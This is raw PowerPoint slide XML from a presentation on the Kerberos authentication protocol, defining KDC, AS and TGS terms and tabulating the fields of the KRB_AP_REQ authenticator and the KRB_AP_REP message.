                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>During user-to-user authentication, after the client has obtained a new ticket for the target service, the client will send a new KRB_AP_REQ with this flag set. This tells the target service to use its session key to decrypt the ticket. (See the User-To-User Authentication section above.)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="318334">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mutual Authentication Required</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>If this flag is set, the target server will respond with the KRB_AP_REP message, which will authenticate the target server to the client.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="439245">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The service ticket for the target server, encrypted in either the target server's secret key or in its session key, depending on whether user-to-user authentication is required.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="318334">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authenticator</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The client's timestamp and other data, encrypted with the session key that the client and target server share.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>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353694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Terminology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3016210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>KDC: Key Distribution Center</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>= an entity to distribute tickets including keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>KDC consists of two services AS and TGS</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>= Domain Controller includes both services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>AS: Authentication Service</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>= a service to issue a Ticket-Granting Ticket (TGT)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>TGS: Ticket-Granting Service</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>= a service to issue a Service Ticket</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Kerberos Realm is, in broad terms, a modeling of administrative scope ==</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> a domain in Active Directory environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143841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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authenticator in KRB_AP_REQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="コンテンツ プレースホルダー 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379322" cy="2444918"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1468800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6910522">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="65880">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="749960">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Checksum</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A checksum of the data from the ticket-granting service request (KRB_TGS_REQ) or application server request (KRB_AP_REQ) message that the authenticator was a part of. This helps validate that the message sender was really the client.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="502435">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Subkey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In a KRB_AP_REQ, this field specifies a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>subkey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> that the target server and the client will use to encrypt further communications, instead of using the TGS-supplied session key.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="502435">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sequence Number</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>An optional field that could be used to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>prevent replays.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>sequence number might be based on the client nonce, for example.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="502435">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authorization Data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This optional field can include authorization data for specific applications. This is not the same as the Authorization Data field that carries the user's privilege attribute certificate (PAC).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4773" marR="4773" marT="4773"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4972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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KRB_AP_REP message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="コンテンツ プレースホルダー 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379322" cy="1488502"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1346880">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7032442">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="75072">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="81530">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Protocol Version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="81530">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Message Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KRB_AP_REP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
